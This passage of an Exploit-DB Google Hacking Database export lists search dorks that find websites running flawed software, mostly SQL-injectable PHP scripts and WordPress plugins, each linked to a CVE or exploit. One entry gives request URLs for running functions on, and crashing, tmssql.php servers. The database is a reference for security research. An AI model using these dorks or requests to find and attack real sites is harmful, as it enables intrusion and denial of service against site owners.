<query>inurl:technote inurl:main.cgi*filename=*</query>
<querystring>https://www.google.com/search?q=inurl%3Atechnote+inurl%3Amain.cgi*filename%3D*+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>2111</id>
<link>https://www.exploit-db.com/ghdb/2111</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:test.php Powered by TalkBack</shortDescription>
<textualDescription>TalkBack 2.3.14 Multiple Remote Vulnerabilities - CVE: 2009-4854: https://www.exploit-db.com/exploits/9095</textualDescription>
<query>inurl:test.php Powered by TalkBack</query>
<querystring>https://www.google.com/search?q=inurl:test.php+Powered+by+TalkBack</querystring>
<edb>https://www.exploit-db.com/exploits/9095</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1332</id>
<link>https://www.exploit-db.com/ghdb/1332</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk</shortDescription>
<textualDescription>dork:inurl:tmssql.php ext:php mssql pear adodb -cvs -akbka remote user can execute an arbitrary function (without arguments) example: http://[target]/[path]/tmssql.php?do=phpinfo reference:http://www.osvdb.org/displayvuln.php?osvdb_id=22291 I also discovered that you can crash some win boxes / apache servers by sendingmultiple requests of http://[target]/[path]/tmssql.php?do=closelogsee:http://www.milw0rm.com/exploits/1651</textualDescription>
<query>inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk</query>
<querystring>https://www.google.com/search?q=inurl:tmssql.php+ext:php+mssql+pear+adodb++-cvs+-akbk&amp;num=100&amp;start=0&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1950</id>
<link>https://www.exploit-db.com/ghdb/1950</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:tr.php?id=</shortDescription>
<textualDescription>Downline Goldmine Category Addon (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6947</textualDescription>
<query>inurl:tr.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:tr.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6947</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1954</id>
<link>https://www.exploit-db.com/ghdb/1954</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:tr.php?id=</shortDescription>
<textualDescription>Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-4178: https://www.exploit-db.com/exploits/6946</textualDescription>
<query>inurl:tr.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:tr.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6946</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2000</id>
<link>https://www.exploit-db.com/ghdb/2000</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:tr.php?id=</shortDescription>
<textualDescription>Downline Goldmine newdownlinebuilder (tr.php id) SQL Injection Vuln: https://www.exploit-db.com/exploits/6951</textualDescription>
<query>inurl:tr.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:tr.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6951</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2001</id>
<link>https://www.exploit-db.com/ghdb/2001</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:tr.php?id=</shortDescription>
<textualDescription>Downline Goldmine paidversion (tr.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6950</textualDescription>
<query>inurl:tr.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:tr.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6950</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2098</id>
<link>https://www.exploit-db.com/ghdb/2098</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:tr.php?id= Autoresponder</shortDescription>
<textualDescription>YourFreeWorld Autoresponder Hosting (id) SQL Injection Vulnerability - CVE: 2008-4882: https://www.exploit-db.com/exploits/6938</textualDescription>
<query>inurl:tr.php?id= Autoresponder</query>
<querystring>https://www.google.com/search?q=inurl:tr.php%3Fid%3D+Autoresponder</querystring>
<edb>https://www.exploit-db.com/exploits/6938</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2335</id>
<link>https://www.exploit-db.com/ghdb/2335</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:tr.php?id= Banner</shortDescription>
<textualDescription>Banner Management Script (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-3749: https://www.exploit-db.com/exploits/6276</textualDescription>
<query>inurl:tr.php?id= Banner</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:tr.php%3Fid%3D+Banner</querystring>
<edb>https://www.exploit-db.com/exploits/6276</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2097</id>
<link>https://www.exploit-db.com/ghdb/2097</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:tr.php?id= Downline</shortDescription>
<textualDescription>YourFreeWorld Downline Builder (id) Remote SQL Injection Vulnerability - CVE: 2008-4895: https://www.exploit-db.com/exploits/6935</textualDescription>
<query>inurl:tr.php?id= Downline</query>
<querystring>https://www.google.com/search?q=inurl:tr.php%3Fid%3D+Downline</querystring>
<edb>https://www.exploit-db.com/exploits/6935</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2055</id>
<link>https://www.exploit-db.com/ghdb/2055</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:tr.php?id= Hosting</shortDescription>
<textualDescription>YourFreeWorld Classifieds Hosting (id) SQL Injection Vulnerability - CVE: 2008-4884: https://www.exploit-db.com/exploits/6948</textualDescription>
<query>inurl:tr.php?id= Hosting</query>
<querystring>https://www.google.com/search?q=inurl:tr.php%3Fid%3D+Hosting</querystring>
<edb>https://www.exploit-db.com/exploits/6948</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2137</id>
<link>https://www.exploit-db.com/ghdb/2137</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:tr.php?id= Reminder Service</shortDescription>
<textualDescription>YourFreeWorld Reminder Service (id) SQL Injection Vulnerability - CVE: 2008-4881: https://www.exploit-db.com/exploits/6943</textualDescription>
<query>inurl:tr.php?id= Reminder Service</query>
<querystring>https://www.google.com/search?q=inurl:tr.php%3Fid%3D+Reminder+Service</querystring>
<edb>https://www.exploit-db.com/exploits/6943</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2407</id>
<link>https://www.exploit-db.com/ghdb/2407</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:treplies.asp?message= intitle:ASP Talk</shortDescription>
<textualDescription>ASP Talk (SQL/CSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7378</textualDescription>
<query>inurl:treplies.asp?message= intitle:ASP Talk</query>
<querystring>https://www.google.com/search?q=inurl:treplies.asp%3Fmessage%3D+++++intitle:ASP+Talk</querystring>
<edb>https://www.exploit-db.com/exploits/7378</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2652</id>
<link>https://www.exploit-db.com/ghdb/2652</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:trr.php?id=</shortDescription>
<textualDescription>Ad Board (id) Remote SQL Injection Vulnerability - CVE: 2008-3725: https://www.exploit-db.com/exploits/6271</textualDescription>
<query>inurl:trr.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:trr.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6271</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>583</id>
<link>https://www.exploit-db.com/ghdb/583</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:ttt-webmaster.php</shortDescription>
<textualDescription>Turbo traffic trader Nitro v1.0 is a free, fully automated traffic trading script. Multiple vulnerabilities were found.Vulnerability report: http://www.securityfocus.com/bid/11358Vendor site: http://www.turbotraffictrader.com/php</textualDescription>
<query>inurl:ttt-webmaster.php</query>
<querystring>https://www.google.com/search?q=inurl:ttt-webmaster.php&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>2612</id>
<link>https://www.exploit-db.com/ghdb/2612</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:ugroups.php?UID=</shortDescription>
<textualDescription>TubeGuru Video Sharing Script (UID) SQL Injection Vulnerability - CVE: 2008-3674: https://www.exploit-db.com/exploits/6170</textualDescription>
<query>inurl:ugroups.php?UID=</query>
<querystring>https://www.google.com/search?q=inurl:ugroups.php%3FUID%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6170</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6775</id>
<link>https://www.exploit-db.com/ghdb/6775</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:uno.php</shortDescription>
<textualDescription># Google Dork: inurl:uno.php
# CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated).
#CVE :CVE-2020-25557 &amp; CVE-2020-25538. https://www.exploit-db.com/exploits/49485
# Date: 3/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:uno.php</query>
<querystring>https://www.google.com/search?q=inurl:uno.php</querystring>
<edb></edb>
<date>2021-02-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2600</id>
<link>https://www.exploit-db.com/ghdb/2600</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:view_group.php?id=</shortDescription>
<textualDescription>BookMarks Favourites Script (view_group.php id) SQL Injection Vuln - CVE: 2008-6007: https://www.exploit-db.com/exploits/6637</textualDescription>
<query>inurl:view_group.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:view_group.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6637</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2207</id>
<link>https://www.exploit-db.com/ghdb/2207</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:w3.php?nodeId=</shortDescription>
<textualDescription>Aspect Ratio CMS Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15205</textualDescription>
<query>inurl:w3.php?nodeId=</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:w3.php%3FnodeId%3D</querystring>
<edb>https://www.exploit-db.com/exploits/15205</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2686</id>
<link>https://www.exploit-db.com/ghdb/2686</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wapmain.php?option=</shortDescription>
<textualDescription>Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12440</textualDescription>
<query>inurl:wapmain.php?option=</query>
<querystring>https://www.google.com/search?q=inurl:wapmain.php%3Foption%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12440</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3170</id>
<link>https://www.exploit-db.com/ghdb/3170</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:we_objectID=</shortDescription>
<textualDescription>webEdition CMS (we_objectID) Blind SQL Injection - CVE: 2008-4154: https://www.exploit-db.com/exploits/6281</textualDescription>
<query>inurl:we_objectID=</query>
<querystring>https://www.google.com/search?q=inurl:we_objectID%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6281</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>625</id>
<link>https://www.exploit-db.com/ghdb/625</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wiki/MediaWiki</shortDescription>
<textualDescription>MediaWiki is reported prone to a cross-site scripting vulnerability. This issue arises due to insufficient sanitization of user-supplied data. A remote attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of a vulnerable user.bugtraq id 11480objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 18, 2004updated Oct 20, 2004vulnerable MediaWiki MediaWiki 1.3MediaWiki MediaWiki 1.3.1MediaWiki MediaWiki 1.3.2MediaWiki MediaWiki 1.3.3MediaWiki MediaWiki 1.3.4MediaWiki MediaWiki 1.3.5MediaWiki MediaWiki 1.3.6not vulnerable MediaWiki MediaWiki 1.3.7</textualDescription>
<query>inurl:wiki/MediaWiki</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=inurl%3Awiki%2FMediaWiki</querystring>
<edb></edb>
<date>2004-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>5001</id>
<link>https://www.exploit-db.com/ghdb/5001</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wls-wsat intext:&quot;weblogic.wsee.wstx.wsat&quot;</shortDescription>
<textualDescription>Finds weblogic wl-wsat services endpoints prone to XML deserialization
Remote Command Execution - CVE-2017-10271
Dork: inurl:wls-wsat intext:&quot;weblogic.wsee.wstx.wsat&quot;
Cheers. Sh3llb0y
</textualDescription>
<query>inurl:wls-wsat intext:&quot;weblogic.wsee.wstx.wsat&quot;</query>
<querystring>https://www.google.com/search?q=inurl:wls-wsat intext:&quot;weblogic.wsee.wstx.wsat&quot;</querystring>
<edb></edb>
<date>2018-10-29</date>
<author>Sh3llb0y</author>
</entry>
<entry>
<id>6978</id>
<link>https://www.exploit-db.com/ghdb/6978</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/1-flash-gallery</shortDescription>
<textualDescription># Dork: inurl:wp-content/plugins/1-flash-gallery
# Description:This google dork lists out Advisories and Vulnerabilities
# regarding the 1-flash-gallery wordpress plugin.
# Ref: https://wpscan.com/vulnerability/36e3817f-7fcc-4a97-9ea2-e5e3b01f93a1
# Author: Rutvik Jaini
</textualDescription>
<query>inurl:wp-content/plugins/1-flash-gallery</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/1-flash-gallery</querystring>
<edb></edb>
<date>2021-06-01</date>
<author>Rutvik Jaini</author>
</entry>
<entry>
<id>6169</id>
<link>https://www.exploit-db.com/ghdb/6169</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/adrotate</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/adrotate
Description: This google dork lists out Advisories and Vulnerabilities
regarding the ad rotate wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10249
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/adrotate</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/adrotate</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>3775</id>
<link>https://www.exploit-db.com/ghdb/3775</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/age-verification/age-verification.php</shortDescription>
<textualDescription>Wordpress Age Verification Plugin
https://www.exploit-db.com/exploits/18350</textualDescription>
<query>inurl:wp-content/plugins/age-verification/age-verification.php</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/age-verification/age-verification.php</querystring>
<edb>https://www.exploit-db.com/exploits/18350</edb>
<date>2012-01-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6108</id>
<link>https://www.exploit-db.com/ghdb/6108</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/ajax-load-more</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/ajax-load-more
Description: This google dork lists out Advisories and Vulnerabilities
regarding the ajax load more wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10230
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/ajax-load-more</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/ajax-load-more</querystring>
<edb></edb>
<date>2020-05-21</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6184</id>
<link>https://www.exploit-db.com/ghdb/6184</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/ajax-load-more/lang/</shortDescription>
<textualDescription> Dork:
inurl:wp-content/plugins/ajax-load-more/lang/
Description: This google dork lists out Advisories and Vulnerabilities
regarding the ajax load more WordPress plugin.
Ref: https://wpvulndb.com/vulnerabilities/10230
Author: Abhinav Porwal
</textualDescription>
<query>inurl:wp-content/plugins/ajax-load-more/lang/</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/ajax-load-more/lang/</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>6418</id>
<link>https://www.exploit-db.com/ghdb/6418</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/all-in-one-wp-migration</shortDescription>
<textualDescription>DORK: inurl:wp-content/plugins/all-in-one-wp-migration
https://wpvulndb.com/vulnerabilities/10151
This google dork gives us the advisories and vulnerabilities on wordpress
plugins
Thanks,
Sachin
</textualDescription>
<query>inurl:wp-content/plugins/all-in-one-wp-migration</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/all-in-one-wp-migration</querystring>
<edb></edb>
<date>2020-07-17</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>6406</id>
<link>https://www.exploit-db.com/ghdb/6406</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/angwp</shortDescription>
<textualDescription>Description: inurl:wp-content/plugins/angwp
This google dorks give us the advisories and vulnerabilities on wordpress
plugins.
Ref: https://wpvulndb.com/vulnerabilities/10293
Thanks,
Tanmay Bhattacharjee
</textualDescription>
<query>inurl:wp-content/plugins/angwp</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/angwp</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Tanmay Bhattacharjee</author>
</entry>
<entry>
<id>6410</id>
<link>https://www.exploit-db.com/ghdb/6410</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/angwp</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/angwp
Description: This google dork lists out Advisories and Vulnerabilities
regarding the angwp wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10293
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/angwp</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/angwp</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6326</id>
<link>https://www.exploit-db.com/ghdb/6326</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/ar-contactus</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/ar-contactus
Description: This google dork lists out Advisories and Vulnerabilities
regarding the ar contactus wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10277
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/ar-contactus</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/ar-contactus</querystring>
<edb></edb>
<date>2020-06-23</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6424</id>
<link>https://www.exploit-db.com/ghdb/6424</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/arforms</shortDescription>
<textualDescription>DORK: inurl:wp-content/plugins/arforms
https://wpvulndb.com/vulnerabilities/
9139
This google dork gives us the advisories and vulnerabilities on wordpress
plugins
Thanks,
Sachin
</textualDescription>
<query>inurl:wp-content/plugins/arforms</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/arforms</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>6417</id>
<link>https://www.exploit-db.com/ghdb/6417</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/async-javascript</shortDescription>
<textualDescription>DORK: inurl:wp-content/plugins/async-javascript
https://wpvulndb.com/vulnerabilities/10098
This google dork gives us the advisories and vulnerabilities on wordpress
plugins
Thanks,
Sachin
</textualDescription>
<query>inurl:wp-content/plugins/async-javascript</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/async-javascript</querystring>
<edb></edb>
<date>2020-07-17</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>6158</id>
<link>https://www.exploit-db.com/ghdb/6158</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/bbPress</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/bbPress
Description: This google dork lists out Advisories and Vulnerabilities
regarding the bbPress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10244
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/bbPress</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/bbPress</querystring>
<edb></edb>
<date>2020-06-01</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6272</id>
<link>https://www.exploit-db.com/ghdb/6272</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/brizy</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/brizy
Description: This google dork lists out Advisories and Vulnerabilities
regarding the brizy wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10261
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/brizy</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/brizy</querystring>
<edb></edb>
<date>2020-06-11</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6078</id>
<link>https://www.exploit-db.com/ghdb/6078</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/chopslider</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/chopslider
Description: This google dork lists out Advisories and Vulnerabilities
regarding the chopslider wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10216
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/chopslider</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/chopslider</querystring>
<edb></edb>
<date>2020-05-12</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6350</id>
<link>https://www.exploit-db.com/ghdb/6350</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/coming-soon</shortDescription>
<textualDescription>Google Dork: inurl:wp-content/plugins/coming-soon
This google dork lists out Advisories and Vulnerabilities regarding
the coming soon page,maintenance and under construction pages.
Ref:https://wpvulndb.com/vulnerabilities/10283
Coming Soon Page, Under Construction &amp; Maintenance Mode by SeedProd &lt; 5.1.2
- Authenticated Stored Cross Site Scripting (XSS)
Author: Ritik Kumar Jain (Dasagreeva)
LinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/
</textualDescription>
<query>inurl:wp-content/plugins/coming-soon</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/coming-soon</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Ritik Kumar Jain</author>
</entry>
<entry>
<id>6137</id>
<link>https://www.exploit-db.com/ghdb/6137</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7
Description: This google dork lists out Advisories and Vulnerabilities
regarding the drag and drop multiple file upload wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10238
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7</querystring>
<edb></edb>
<date>2020-05-27</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6091</id>
<link>https://www.exploit-db.com/ghdb/6091</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/easy-login-woocommerce</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/easy-login-woocommerce
Description: This google dork lists out Advisories and Vulnerabilities
regarding the easy login woocommerce wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10225
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/easy-login-woocommerce</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/easy-login-woocommerce</querystring>
<edb></edb>
<date>2020-05-18</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6455</id>
<link>https://www.exploit-db.com/ghdb/6455</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/easy-media-gallery-pro</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/easy-media-gallery-pro
Description: This google dork lists out Advisories and Vulnerabilities
regarding the easy media gallery pro wordpress plugin.
Ref: https://wpvulndb.com/vulnerabilities/7545
Author: Lokesh S
</textualDescription>
<query>inurl:wp-content/plugins/easy-media-gallery-pro</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/easy-media-gallery-pro</querystring>
<edb></edb>
<date>2020-07-28</date>
<author>Lokesh S</author>
</entry>
<entry>
<id>6085</id>
<link>https://www.exploit-db.com/ghdb/6085</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/easy-testimonials</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/easy-testimonials
Description: This google dork lists out Advisories and Vulnerabilities
regarding the easy testimonials wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10223
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/easy-testimonials</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/easy-testimonials</querystring>
<edb></edb>
<date>2020-05-14</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6297</id>
<link>https://www.exploit-db.com/ghdb/6297</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/elementor</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/elementor
Description: This google dork lists out Advisories and Vulnerabilities
regarding the elementor wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10256
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/elementor</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/elementor</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6071</id>
<link>https://www.exploit-db.com/ghdb/6071</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/elementor-pro</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/elementor-pro
Description: This Google dork lists out Advisories and Vulnerabilities
about the Elementor Pro Plugin. Ref:
https://wpvulndb.com/vulnerabilities/10214
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/elementor-pro</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/elementor-pro</querystring>
<edb></edb>
<date>2020-05-08</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6428</id>
<link>https://www.exploit-db.com/ghdb/6428</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/email-subscribers</shortDescription>
<textualDescription>DORK:inurl:wp-content/plugins/email-subscribers
https://wpvulndb.com/vulnerabilities/
10322
This google dork gives us the advisories and vulnerabilities on wordpress
plugins</textualDescription>
<query>inurl:wp-content/plugins/email-subscribers</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/email-subscribers</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>6201</id>
<link>https://www.exploit-db.com/ghdb/6201</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/final-tiles-grid-gallery-lite</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/final-tiles-grid-gallery-lite
Description: This google dork lists out Advisories and Vulnerabilities
regarding the final tiles grid gallery lite wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10241
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/final-tiles-grid-gallery-lite</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/final-tiles-grid-gallery-lite</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6217</id>
<link>https://www.exploit-db.com/ghdb/6217</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/final-tiles-grid-gallery-lite</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/final-tiles-grid-gallery-lite
Description: This google dork lists out Advisories and Vulnerabilities
regarding the final-tiles-grid-gallery-lite wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10241
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/final-tiles-grid-gallery-lite</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/final-tiles-grid-gallery-lite</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6347</id>
<link>https://www.exploit-db.com/ghdb/6347</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/form-maker</shortDescription>
<textualDescription>Google Dork: inurl:wp-content/plugins/form-maker
